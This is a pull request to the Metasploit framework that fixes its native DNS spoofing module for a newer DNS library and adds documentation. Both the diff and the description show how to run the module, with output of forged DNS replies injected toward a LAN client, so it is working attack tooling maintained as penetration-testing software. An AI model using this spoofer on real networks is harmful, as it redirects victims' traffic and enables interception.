### PR TITLE
Update auxiliary/spoof/dns/native_spoofer

### DIFF
--- a/documentation/modules/auxiliary/spoof/dns/native_spoofer.md
+++ b/documentation/modules/auxiliary/spoof/dns/native_spoofer.md
@@ -1,0 +1,152 @@
+## Vulnerable Application
+
+This module provides a Rex based DNS service to resolve queries intercepted via the capture mixin. Configure
+STATIC_ENTRIES to contain host-name mappings desired for spoofing using a hostsfile or space/semicolon separated
+entries. In the default configuration, the service operates as a normal native DNS server with the exception of
+consuming from and writing to the wire as opposed to a listening socket. Best when compromising routers or spoofing L2
+in order to prevent return of the real reply which causes a race condition. The method by which replies are filtered is
+up to the user (though iptables works fine).
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/spoof/dns/native_spoofer`
+1. Do: `run`
+
+## Options
+
+### DISABLE_NS_CACHE
+
+Disable DNS response caching.
+
+### DISABLE_RESOLVER
+
+Disable DNS request forwarding.
+
+### FILTER
+
+The filter string for capturing traffic. This allows the module to, for example, only process requests made from a
+target host or subnet.
+
+### INTERFACE
+
+The name of the interface to listen on.
+
+### NS
+
+Specify the nameservers to use for queries, space separated.
+
+### SEARCHLIST
+
+DNS domain search list, comma separated.
+
+### STATIC_ENTRIES
+
+DNS domain search list (hosts file or space/semicolon separate entries). Example: `1.2.3.4 example.com`
+
+## Scenarios
+
+### DNS Spoofing
+
+```
+msf6 auxiliary(spoof/dns/native_spoofer) > show options 
+
+Module options (auxiliary/spoof/dns/native_spoofer):
+
+   Name              Current Setting                       Required  Description
+   ----              ---------------                       --------  -----------
+   DISABLE_NS_CACHE  false                                 no        Disable DNS response caching
+   DISABLE_RESOLVER  false                                 no        Disable DNS request forwarding
+   DOMAIN                                                  no        The target domain name
+   FILTER            dst port 53 and host 192.168.250.134  no        The filter string for capturing traffic
+   INTERFACE                                               no        The name of the interface
+   NS                192.168.250.4                         no        Specify the nameservers to use for queries, space separated
+   Proxies                                                 no        A proxy chain of format type:host:port[,type:host:port][...]
+   RPORT             53                                    yes       The target port (TCP)
+   SEARCHLIST                                              no        DNS domain search list, comma separated
+   SNAPLEN           65535                                 yes       The number of bytes to capture
+   SRVHOST           192.168.250.160                       yes       The local host to listen on for DNS services.
+   SRVPORT           53                                    yes       The local port to listen on.
+   STATIC_ENTRIES    1.2.3.4 example.com                   no        DNS domain search list (hosts file or space/semicolon separate entries)
+   THREADS           1                                     yes       Number of threads to use in threaded queries
+   TIMEOUT           500                                   yes       The number of seconds to wait for new data
+
+
+Auxiliary action:
+
+   Name     Description
+   ----     -----------
+   Service  Serve DNS entries
+
+
+msf6 auxiliary(spoof/dns/native_spoofer) > run
+[*] Auxiliary module running as background job 2.
+msf6 auxiliary(spoof/dns/native_spoofer) > SIOCSIFFLAGS: Operation not permitted
+msf6 auxiliary(spoof/dns/native_spoofer) > 
+[*] Caching response google.com:172.217.15.110 A
+[+] Sent packet with header:
+--EthHeader-----------------------------------
+  eth_dst   50:eb:71:1a:59:8c PacketFu::EthMac
+  eth_src   36:a6:88:92:60:5b PacketFu::EthMac
+  eth_proto 0x0800            StructFu::Int16 
+--IPHeader------------------------------------
+  ip_v      4                 Integer         
+  ip_hl     5                 Integer         
+  ip_tos    0                 StructFu::Int8  
+  ip_len    144               StructFu::Int16 
+  ip_id     0x403c            StructFu::Int16 
+  ip_frag   0                 StructFu::Int16 
+  ip_ttl    64                StructFu::Int8  
+  ip_proto  17                StructFu::Int8  
+  ip_sum    0xc3a8            StructFu::Int16 
+  ip_src    192.168.250.160   PacketFu::Octets
+  ip_dst    192.168.250.134   PacketFu::Octets
+--UDPHeader-----------------------------------
+  udp_src   53                StructFu::Int16 
+  udp_dst   39435             StructFu::Int16 
+  udp_len   124               StructFu::Int16 
+  udp_sum   0xeefc            StructFu::Int16 
+------------------------------------------------------------------
+00-01-02-03-04-05-06-07-08-09-0a-0b-0c-0d-0e-0f---0123456789abcdef
+------------------------------------------------------------------
+10 4a 81 80 00 01 00 01 00 04 00 00 06 67 6f 6f   .J...........goo
+67 6c 65 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01   gle.com.........
+00 01 00 00 00 7a 00 04 ac d9 0f 6e c0 0c 00 02   .....z.....n....
+00 01 00 00 40 b5 00 06 03 6e 73 32 c0 0c c0 0c   ....@....ns2....
+00 02 00 01 00 00 40 b5 00 06 03 6e 73 31 c0 0c   ......@....ns1..
+c0 0c 00 02 00 01 00 00 40 b5 00 06 03 6e 73 33   ........@....ns3
+c0 0c c0 0c 00 02 00 01 00 00 40 b5 00 06 03 6e   ..........@....n
+73 34 c0 0c                                       s4..
+[+] Spoofed records for google.com to 192.168.250.134:39435
+[+] Sent packet with header:
+--EthHeader-----------------------------------
+  eth_dst   50:eb:71:1a:59:8c PacketFu::EthMac
+  eth_src   36:a6:88:92:60:5b PacketFu::EthMac
+  eth_proto 0x0800            StructFu::Int16 
+--IPHeader------------------------------------
+  ip_v      4                 Integer         
+  ip_hl     5                 Integer         
+  ip_tos    0                 StructFu::Int8  
+  ip_len    96                StructFu::Int16 
+  ip_id     0x2ff2            StructFu::Int16 
+  ip_frag   0                 StructFu::Int16 
+  ip_ttl    64                StructFu::Int8  
+  ip_proto  17                StructFu::Int8  
+  ip_sum    0xd422            StructFu::Int16 
+  ip_src    192.168.250.160   PacketFu::Octets
+  ip_dst    192.168.250.134   PacketFu::Octets
+--UDPHeader-----------------------------------
+  udp_src   53                StructFu::Int16 
+  udp_dst   38058             StructFu::Int16 
+  udp_len   76                StructFu::Int16 
+  udp_sum   0x00ab            StructFu::Int16 
+------------------------------------------------------------------
+00-01-02-03-04-05-06-07-08-09-0a-0b-0c-0d-0e-0f---0123456789abcdef
+------------------------------------------------------------------
+33 c8 81 20 00 01 00 01 00 00 00 01 07 65 78 61   3.. .........exa
+6d 70 6c 65 03 63 6f 6d 00 00 01 00 01 c0 0c 00   mple.com........
+01 00 01 00 00 00 00 00 04 01 02 03 04 00 00 29   ...............)
+10 00 00 00 00 00 00 0c 00 0a 00 08 6f 59 ce 04   ............oY..
+8e 13 7b 7d                                       ..{}
+[+] Spoofed records for example.com to 192.168.250.134:38058
+```

--- a/modules/auxiliary/spoof/dns/native_spoofer.rb
+++ b/modules/auxiliary/spoof/dns/native_spoofer.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
         This module provides a Rex based DNS service to resolve queries intercepted
         via the capture mixin. Configure STATIC_ENTRIES to contain host-name mappings
         desired for spoofing using a hostsfile or space/semicolon separated entries.
-        In default configuration, the service operates as a normal native DNS server
+        In the default configuration, the service operates as a normal native DNS server
         with the exception of consuming from and writing to the wire as opposed to a
         listening socket. Best when compromising routers or spoofing L2 in order to
         prevent return of the real reply which causes a race condition. The method
@@ -93,11 +93,17 @@ class MetasploitModule < Msf::Auxiliary
       each_packet do |pack|
         begin
           parsed = PacketFu::Packet.parse(pack)
+        rescue => e
+          vprint_status("PacketFu could not parse captured packet")
+          elog('PacketFu could not parse captured packet', error: e)
+        end
+
+        begin
           reply = reply_packet(parsed)
           service.dispatch_request(reply, parsed.payload)
         rescue => e
-          vprint_status("PacketFu could not parse captured packet")
-          dlog(e.backtrace)
+          vprint_status("Could not process captured packet")
+          elog('Could not process captured packet', error: e)
         end
       end
     end
@@ -106,8 +112,11 @@ class MetasploitModule < Msf::Auxiliary
   #
   # Creates Proc to handle incoming requests
   #
-  def on_dispatch_request(cli,data)
+  def on_dispatch_request(cli, data)
+    return unless cli.is_a?(PacketFu::Packet)
+
     peer = "#{cli.ip_daddr}:" << (cli.is_udp? ? "#{cli.udp_dst}" : "#{cli.tcp_dst}")
+
     # Deal with non DNS traffic
     begin
       req = Packet.encode_drb(data)
@@ -116,6 +125,7 @@ class MetasploitModule < Msf::Auxiliary
       dlog e.backtrace
       return
     end
+
     answered = []
     # Find cached items, remove request from forwarded packet
     req.question.each do |ques|
@@ -123,48 +133,65 @@ class MetasploitModule < Msf::Auxiliary
       if cached.empty?
         next
       else
-        req.answer = (req.answer + cached).uniq
+        cached.each do |subcached|
+          req.add_answer(subcached) unless req.answer.include?(subcached)
+        end
+
         answered << ques
       end
     end
+
     if answered.count < req.question.count and service.fwd_res
-      if !req.header.recursive?
+      if req.header.rd == 0
         vprint_status("Recursion forbidden in query for #{req.question.first.name} from #{peer}")
       else
         forward = req.dup
-        forward.question = req.question - answered
-        forwarded = service.fwd_res.send(Packet.validate(forward))
+        forward.question.delete_if { |question| answered.include?(question) }
+        begin
+          forwarded = service.fwd_res.send(Packet.validate(forward))
+        rescue NoResponseError
+          vprint_error('Did not receive a response')
+          return
+        end
+
         forwarded.answer.each do |ans|
           rstring = ans.respond_to?(:address) ? "#{ans.name}:#{ans.address}" : ans.name
           vprint_status("Caching response #{rstring} #{ans.type}")
           service.cache.cache_record(ans)
         end unless service.cache.nil?
+
         # Merge the answers and use the upstream response
-        forwarded.answer = (req.answer + forwarded.answer).uniq
+        req.answer.each do |answer|
+          forwarded.add_answer(answer) unless forwarded.answer.include?(answer)
+        end
         req = forwarded
       end
     end
-    service.send_response(cli, Packet.validate(Packet.generate_response(req)).data)
+
+    req.header.qr = true
+    service.send_response(cli, req.encode)
   end
 
   #
   # Creates Proc to handle outbound responses
   #
-  def on_send_response(cli,data)
+  def on_send_response(cli, data)
+    return unless cli.is_a?(PacketFu::Packet)
+
     cli.payload = data
     cli.recalc
     inject cli.to_s
-    sent_info(cli,data) if datastore['VERBOSE']
+    sent_info(cli, data) if datastore['VERBOSE']
   end
 
   #
   # Prints information about spoofed packet after injection to reduce latency of operation
   # Shown to improve response time by >50% from ~1ms -> 0.3-0.4ms
   #
-  def sent_info(cli,data)
+  def sent_info(cli, data)
     net = Packet.encode_net(data)
     peer = "#{cli.ip_daddr}:" << (cli.is_udp? ? "#{cli.udp_dst}" : "#{cli.tcp_dst}")
-    asked = net.question.map(&:qname).join(', ')
+    asked = net.question.map { |q| q.qName.delete_suffix('.') }.join(', ')
     vprint_good("Sent packet with header:\n#{cli.inspect}")
     vprint_good("Spoofed records for #{asked} to #{peer}")
   end


### PR DESCRIPTION
The `auxiliary/spoof/dns/native_spoofer` module needed to be refactored to use the new Dnsruby API. Prior to these changes, the module would crash when it received a request.

This also applies rubocop fixes. Fixes #16297. While testing this module, I had issues getting it to work from a VMWare virtual machine. What did work however was running it on native hardware. I'm pretty sure the VMWare issue is outside the control of Metasploit and unrelated to the changes proposed here.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/spoof/dns/native_spoofer`
- [ ] `set STATIC_ENTRIES 1.2.3.4 example.com`, this makes sure that the static entries functionality is available
- [ ] `set VERBOSE true`, this makes it easier to see what's going on including the DNS responses
- [ ] Run the module
- [ ] From another host, send DNS queries to the system where Metasploit is running
- [ ] See the DNS response in both Metasploit and the client

## Example Output

In this example, 192.168.250.134 is a client on the same LAN. That client then sends DNS requests to the system where Metasploit is running. It requests `google.com` and `example.com` to show that both the static entries and recursive functionalities are working as intended.

```
msf6 auxiliary(spoof/dns/native_spoofer) > show options 

Module options (auxiliary/spoof/dns/native_spoofer):

   Name              Current Setting                       Required  Description
   ----              ---------------                       --------  -----------
   DISABLE_NS_CACHE  false                                 no        Disable DNS response caching
   DISABLE_RESOLVER  false                                 no        Disable DNS request forwarding
   DOMAIN                                                  no        The target domain name
   FILTER            dst port 53 and host 192.168.250.134  no        The filter string for capturing traffic
   INTERFACE                                               no        The name of the interface
   NS                192.168.250.4                         no        Specify the nameservers to use for queries, space separated
   Proxies                                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RPORT             53                                    yes       The target port (TCP)
   SEARCHLIST                                              no        DNS domain search list, comma separated
   SNAPLEN           65535                                 yes       The number of bytes to capture
   SRVHOST           192.168.250.160                       yes       The local host to listen on for DNS services.
   SRVPORT           53                                    yes       The local port to listen on.
   STATIC_ENTRIES    1.2.3.4 example.com                   no        DNS domain search list (hosts file or space/semicolon separate entries)
   THREADS           1                                     yes       Number of threads to use in threaded queries
   TIMEOUT           500                                   yes       The number of seconds to wait for new data


Auxiliary action:

   Name     Description
   ----     -----------
   Service  Serve DNS entries


msf6 auxiliary(spoof/dns/native_spoofer) > run
[*] Auxiliary module running as background job 2.
msf6 auxiliary(spoof/dns/native_spoofer) > SIOCSIFFLAGS: Operation not permitted
msf6 auxiliary(spoof/dns/native_spoofer) > 
[*] Caching response google.com:172.217.15.110 A
[+] Sent packet with header:
--EthHeader-----------------------------------
  eth_dst   50:eb:71:1a:59:8c PacketFu::EthMac
  eth_src   36:a6:88:92:60:5b PacketFu::EthMac
  eth_proto 0x0800            StructFu::Int16 
--IPHeader------------------------------------
  ip_v      4                 Integer         
  ip_hl     5                 Integer         
  ip_tos    0                 StructFu::Int8  
  ip_len    144               StructFu::Int16 
  ip_id     0x403c            StructFu::Int16 
  ip_frag   0                 StructFu::Int16 
  ip_ttl    64                StructFu::Int8  
  ip_proto  17                StructFu::Int8  
  ip_sum    0xc3a8            StructFu::Int16 
  ip_src    192.168.250.160   PacketFu::Octets
  ip_dst    192.168.250.134   PacketFu::Octets
--UDPHeader-----------------------------------
  udp_src   53                StructFu::Int16 
  udp_dst   39435             StructFu::Int16 
  udp_len   124               StructFu::Int16 
  udp_sum   0xeefc            StructFu::Int16 
------------------------------------------------------------------
00-01-02-03-04-05-06-07-08-09-0a-0b-0c-0d-0e-0f---0123456789abcdef
------------------------------------------------------------------
10 4a 81 80 00 01 00 01 00 04 00 00 06 67 6f 6f   .J...........goo
67 6c 65 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01   gle.com.........
00 01 00 00 00 7a 00 04 ac d9 0f 6e c0 0c 00 02   .....z.....n....
00 01 00 00 40 b5 00 06 03 6e 73 32 c0 0c c0 0c   ....@....ns2....
00 02 00 01 00 00 40 b5 00 06 03 6e 73 31 c0 0c   ......@....ns1..
c0 0c 00 02 00 01 00 00 40 b5 00 06 03 6e 73 33   ........@....ns3
c0 0c c0 0c 00 02 00 01 00 00 40 b5 00 06 03 6e   ..........@....n
73 34 c0 0c                                       s4..
[+] Spoofed records for google.com to 192.168.250.134:39435
[+] Sent packet with header:
--EthHeader-----------------------------------
  eth_dst   50:eb:71:1a:59:8c PacketFu::EthMac
  eth_src   36:a6:88:92:60:5b PacketFu::EthMac
  eth_proto 0x0800            StructFu::Int16 
--IPHeader------------------------------------
  ip_v      4                 Integer         
  ip_hl     5                 Integer         
  ip_tos    0                 StructFu::Int8  
  ip_len    96                StructFu::Int16 
  ip_id     0x2ff2            StructFu::Int16 
  ip_frag   0                 StructFu::Int16 
  ip_ttl    64                StructFu::Int8  
  ip_proto  17                StructFu::Int8  
  ip_sum    0xd422            StructFu::Int16 
  ip_src    192.168.250.160   PacketFu::Octets
  ip_dst    192.168.250.134   PacketFu::Octets
--UDPHeader-----------------------------------
  udp_src   53                StructFu::Int16 
  udp_dst   38058             StructFu::Int16 
  udp_len   76                StructFu::Int16 
  udp_sum   0x00ab            StructFu::Int16 
------------------------------------------------------------------
00-01-02-03-04-05-06-07-08-09-0a-0b-0c-0d-0e-0f---0123456789abcdef
------------------------------------------------------------------
33 c8 81 20 00 01 00 01 00 00 00 01 07 65 78 61   3.. .........exa
6d 70 6c 65 03 63 6f 6d 00 00 01 00 01 c0 0c 00   mple.com........
01 00 01 00 00 00 00 00 04 01 02 03 04 00 00 29   ...............)
10 00 00 00 00 00 00 0c 00 0a 00 08 6f 59 ce 04   ............oY..
8e 13 7b 7d                                       ..{}
[+] Spoofed records for example.com to 192.168.250.134:38058
```
